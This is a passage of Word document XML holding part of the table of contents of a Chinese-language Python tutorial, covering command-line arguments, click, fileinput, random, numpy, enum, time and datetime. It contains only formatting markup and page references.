            <w:pStyle w:val="TOC3"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="8296"/>
            </w:tabs>
            <w:jc w:val="left"/>
            <w:rPr>
              <w:noProof/>
              <w:szCs w:val="22"/>
              <w14:ligatures w14:val="standardContextual"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc159779909" w:history="1">
            <w:r w:rsidRPr="00FD3362">
              <w:rPr>
                <w:rStyle w:val="a5"/>
                <w:noProof/>
              </w:rPr>
              <w:t>短选项（命令行缩写）</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc159779909 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:t>465</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="49852944" w14:textId="4710E099" w:rsidR="009926EB" w:rsidRDefault="009926EB" w:rsidP="009222EB">
          <w:pPr>
            <w:pStyle w:val="TOC3"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="8296"/>
            </w:tabs>
            <w:jc w:val="left"/>
            <w:rPr>
              <w:noProof/>
              <w:szCs w:val="22"/>
              <w14:ligatures w14:val="standardContextual"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc159779910" w:history="1">
            <w:r w:rsidRPr="00FD3362">
              <w:rPr>
                <w:rStyle w:val="a5"/>
                <w:noProof/>
              </w:rPr>
              <w:t>无参数值的标志性参数</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc159779910 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:t>465</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="148CE50E" w14:textId="716605FD" w:rsidR="009926EB" w:rsidRDefault="009926EB" w:rsidP="009222EB">
          <w:pPr>
            <w:pStyle w:val="TOC3"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="8296"/>
            </w:tabs>
            <w:jc w:val="left"/>
            <w:rPr>
              <w:noProof/>
              <w:szCs w:val="22"/>
              <w14:ligatures w14:val="standardContextual"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc159779911" w:history="1">
            <w:r w:rsidRPr="00FD3362">
              <w:rPr>
                <w:rStyle w:val="a5"/>
                <w:noProof/>
              </w:rPr>
              <w:t>多选一选项</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc159779911 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:t>465</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="7C3C0B45" w14:textId="2657D0AA" w:rsidR="009926EB" w:rsidRDefault="009926EB" w:rsidP="009222EB">
          <w:pPr>
            <w:pStyle w:val="TOC2"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="8296"/>
            </w:tabs>
            <w:jc w:val="left"/>
            <w:rPr>
              <w:noProof/>
              <w:szCs w:val="22"/>
              <w14:ligatures w14:val="standardContextual"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc159779912" w:history="1">
            <w:r w:rsidRPr="00FD3362">
              <w:rPr>
                <w:rStyle w:val="a5"/>
                <w:noProof/>
              </w:rPr>
              <w:t>click</w:t>
            </w:r>
            <w:r w:rsidRPr="00FD3362">
              <w:rPr>
                <w:rStyle w:val="a5"/>
                <w:noProof/>
              </w:rPr>
              <w:t>：命令行传参</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc159779912 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:t>466</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="26895752" w14:textId="7668D488" w:rsidR="009926EB" w:rsidRDefault="009926EB" w:rsidP="009222EB">
          <w:pPr>
            <w:pStyle w:val="TOC2"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="8296"/>
            </w:tabs>
            <w:jc w:val="left"/>
            <w:rPr>
              <w:noProof/>
              <w:szCs w:val="22"/>
              <w14:ligatures w14:val="standardContextual"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc159779913" w:history="1">
            <w:r w:rsidRPr="00FD3362">
              <w:rPr>
                <w:rStyle w:val="a5"/>
                <w:noProof/>
              </w:rPr>
              <w:t>fileinput</w:t>
            </w:r>
            <w:r w:rsidRPr="00FD3362">
              <w:rPr>
                <w:rStyle w:val="a5"/>
                <w:noProof/>
              </w:rPr>
              <w:t>：管道</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc159779913 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:t>466</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="7DE7A500" w14:textId="5ADB80E7" w:rsidR="009926EB" w:rsidRDefault="009926EB" w:rsidP="009222EB">
          <w:pPr>
            <w:pStyle w:val="TOC2"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="8296"/>
            </w:tabs>
            <w:jc w:val="left"/>
            <w:rPr>
              <w:noProof/>
              <w:szCs w:val="22"/>
              <w14:ligatures w14:val="standardContextual"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc159779914" w:history="1">
            <w:r w:rsidRPr="00FD3362">
              <w:rPr>
                <w:rStyle w:val="a5"/>
                <w:noProof/>
              </w:rPr>
              <w:t>随机数</w:t>
            </w:r>
            <w:r w:rsidRPr="00FD3362">
              <w:rPr>
                <w:rStyle w:val="a5"/>
                <w:noProof/>
              </w:rPr>
              <w:t xml:space="preserve"> random</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc159779914 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:t>466</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="3AB1E464" w14:textId="020B0863" w:rsidR="009926EB" w:rsidRDefault="009926EB" w:rsidP="009222EB">
          <w:pPr>
            <w:pStyle w:val="TOC3"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="8296"/>
            </w:tabs>
            <w:jc w:val="left"/>
            <w:rPr>
              <w:noProof/>
              <w:szCs w:val="22"/>
              <w14:ligatures w14:val="standardContextual"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc159779915" w:history="1">
            <w:r w:rsidRPr="00FD3362">
              <w:rPr>
                <w:rStyle w:val="a5"/>
                <w:noProof/>
              </w:rPr>
              <w:t>random</w:t>
            </w:r>
            <w:r w:rsidRPr="00FD3362">
              <w:rPr>
                <w:rStyle w:val="a5"/>
                <w:noProof/>
              </w:rPr>
              <w:t>库</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc159779915 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:t>466</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="55939FAD" w14:textId="1B8EA87C" w:rsidR="009926EB" w:rsidRDefault="009926EB" w:rsidP="009222EB">
          <w:pPr>
            <w:pStyle w:val="TOC3"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="8296"/>
            </w:tabs>
            <w:jc w:val="left"/>
            <w:rPr>
              <w:noProof/>
              <w:szCs w:val="22"/>
              <w14:ligatures w14:val="standardContextual"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc159779916" w:history="1">
            <w:r w:rsidRPr="00FD3362">
              <w:rPr>
                <w:rStyle w:val="a5"/>
                <w:noProof/>
              </w:rPr>
              <w:t>numpy</w:t>
            </w:r>
            <w:r w:rsidRPr="00FD3362">
              <w:rPr>
                <w:rStyle w:val="a5"/>
                <w:noProof/>
              </w:rPr>
              <w:t>库</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc159779916 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:t>469</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="1B619767" w14:textId="72D27FB9" w:rsidR="009926EB" w:rsidRDefault="009926EB" w:rsidP="009222EB">
          <w:pPr>
            <w:pStyle w:val="TOC2"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="8296"/>
            </w:tabs>
            <w:jc w:val="left"/>
            <w:rPr>
              <w:noProof/>
              <w:szCs w:val="22"/>
              <w14:ligatures w14:val="standardContextual"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc159779917" w:history="1">
            <w:r w:rsidRPr="00FD3362">
              <w:rPr>
                <w:rStyle w:val="a5"/>
                <w:noProof/>
              </w:rPr>
              <w:t>枚举类型</w:t>
            </w:r>
            <w:r w:rsidRPr="00FD3362">
              <w:rPr>
                <w:rStyle w:val="a5"/>
                <w:noProof/>
              </w:rPr>
              <w:t>:enum</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc159779917 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:t>469</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="09F9FEF2" w14:textId="671BDD55" w:rsidR="009926EB" w:rsidRDefault="009926EB" w:rsidP="009222EB">
          <w:pPr>
            <w:pStyle w:val="TOC3"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="8296"/>
            </w:tabs>
            <w:jc w:val="left"/>
            <w:rPr>
              <w:noProof/>
              <w:szCs w:val="22"/>
              <w14:ligatures w14:val="standardContextual"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc159779918" w:history="1">
            <w:r w:rsidRPr="00FD3362">
              <w:rPr>
                <w:rStyle w:val="a5"/>
                <w:noProof/>
              </w:rPr>
              <w:t>枚举类型的访问</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc159779918 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:t>469</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="56B64A0D" w14:textId="4C15D919" w:rsidR="009926EB" w:rsidRDefault="009926EB" w:rsidP="009222EB">
          <w:pPr>
            <w:pStyle w:val="TOC3"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="8296"/>
            </w:tabs>
            <w:jc w:val="left"/>
            <w:rPr>
              <w:noProof/>
              <w:szCs w:val="22"/>
              <w14:ligatures w14:val="standardContextual"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc159779919" w:history="1">
            <w:r w:rsidRPr="00FD3362">
              <w:rPr>
                <w:rStyle w:val="a5"/>
                <w:noProof/>
              </w:rPr>
              <w:t>遍历</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc159779919 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:t>470</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="2A43C125" w14:textId="346231F5" w:rsidR="009926EB" w:rsidRDefault="009926EB" w:rsidP="009222EB">
          <w:pPr>
            <w:pStyle w:val="TOC2"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="8296"/>
            </w:tabs>
            <w:jc w:val="left"/>
            <w:rPr>
              <w:noProof/>
              <w:szCs w:val="22"/>
              <w14:ligatures w14:val="standardContextual"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc159779920" w:history="1">
            <w:r w:rsidRPr="00FD3362">
              <w:rPr>
                <w:rStyle w:val="a5"/>
                <w:noProof/>
              </w:rPr>
              <w:t>time</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc159779920 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:t>470</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="04557BEA" w14:textId="244303C4" w:rsidR="009926EB" w:rsidRDefault="009926EB" w:rsidP="009222EB">
          <w:pPr>
            <w:pStyle w:val="TOC3"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="8296"/>
            </w:tabs>
            <w:jc w:val="left"/>
            <w:rPr>
              <w:noProof/>
              <w:szCs w:val="22"/>
              <w14:ligatures w14:val="standardContextual"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc159779921" w:history="1">
            <w:r w:rsidRPr="00FD3362">
              <w:rPr>
                <w:rStyle w:val="a5"/>
                <w:noProof/>
              </w:rPr>
              <w:t>时间戳</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc159779921 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:t>470</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="5E7F80D2" w14:textId="2570F8F1" w:rsidR="009926EB" w:rsidRDefault="009926EB" w:rsidP="009222EB">
          <w:pPr>
            <w:pStyle w:val="TOC3"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="8296"/>
            </w:tabs>
            <w:jc w:val="left"/>
            <w:rPr>
              <w:noProof/>
              <w:szCs w:val="22"/>
              <w14:ligatures w14:val="standardContextual"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc159779922" w:history="1">
            <w:r w:rsidRPr="00FD3362">
              <w:rPr>
                <w:rStyle w:val="a5"/>
                <w:noProof/>
              </w:rPr>
              <w:t>获取格式化时间</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc159779922 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:t>470</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="5C7DD6B3" w14:textId="19F02F97" w:rsidR="009926EB" w:rsidRDefault="009926EB" w:rsidP="009222EB">
          <w:pPr>
            <w:pStyle w:val="TOC2"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="8296"/>
            </w:tabs>
            <w:jc w:val="left"/>
            <w:rPr>
              <w:noProof/>
              <w:szCs w:val="22"/>
              <w14:ligatures w14:val="standardContextual"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc159779923" w:history="1">
            <w:r w:rsidRPr="00FD3362">
              <w:rPr>
                <w:rStyle w:val="a5"/>
                <w:noProof/>
              </w:rPr>
              <w:t>datetime</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc159779923 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:t>471</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="62A265C5" w14:textId="7200501B" w:rsidR="009926EB" w:rsidRDefault="009926EB" w:rsidP="009222EB">
          <w:pPr>
            <w:pStyle w:val="TOC3"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="8296"/>
            </w:tabs>
            <w:jc w:val="left"/>
            <w:rPr>
              <w:noProof/>
              <w:szCs w:val="22"/>
              <w14:ligatures w14:val="standardContextual"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc159779924" w:history="1">
            <w:r w:rsidRPr="00FD3362">
              <w:rPr>
                <w:rStyle w:val="a5"/>
                <w:noProof/>
              </w:rPr>
              <w:t>获取今天</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc159779924 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:t>471</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="0B27211E" w14:textId="70708F79" w:rsidR="009926EB" w:rsidRDefault="009926EB" w:rsidP="009222EB">
          <w:pPr>
            <w:pStyle w:val="TOC3"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="8296"/>
            </w:tabs>
            <w:jc w:val="left"/>
            <w:rPr>
              <w:noProof/>
              <w:szCs w:val="22"/>
              <w14:ligatures w14:val="standardContextual"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc159779925" w:history="1">
            <w:r w:rsidRPr="00FD3362">
              <w:rPr>
                <w:rStyle w:val="a5"/>
                <w:noProof/>
              </w:rPr>
              <w:t>转换时间：将</w:t>
            </w:r>
            <w:r w:rsidRPr="00FD3362">
              <w:rPr>
                <w:rStyle w:val="a5"/>
                <w:noProof/>
              </w:rPr>
              <w:t>'Feb 27, 2023'</w:t>
            </w:r>
            <w:r w:rsidRPr="00FD3362">
              <w:rPr>
                <w:rStyle w:val="a5"/>
                <w:noProof/>
              </w:rPr>
              <w:t>变为标准时间</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc159779925 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:t>472</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="772E3A9C" w14:textId="214214C7" w:rsidR="009926EB" w:rsidRDefault="009926EB" w:rsidP="009222EB">
          <w:pPr>
            <w:pStyle w:val="TOC3"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="8296"/>
            </w:tabs>
            <w:jc w:val="left"/>
            <w:rPr>
              <w:noProof/>
              <w:szCs w:val="22"/>
              <w14:ligatures w14:val="standardContextual"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc159779926" w:history="1">
            <w:r w:rsidRPr="00FD3362">
              <w:rPr>
                <w:rStyle w:val="a5"/>
                <w:noProof/>
              </w:rPr>
              <w:t>将</w:t>
            </w:r>
            <w:r w:rsidRPr="00FD3362">
              <w:rPr>
                <w:rStyle w:val="a5"/>
                <w:noProof/>
              </w:rPr>
              <w:t>datetime</w:t>
            </w:r>
            <w:r w:rsidRPr="00FD3362">
              <w:rPr>
                <w:rStyle w:val="a5"/>
                <w:noProof/>
              </w:rPr>
              <w:t>类型格式化字符串</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc159779926 \h </w:instrText>
            </w:r>
            <w:r>
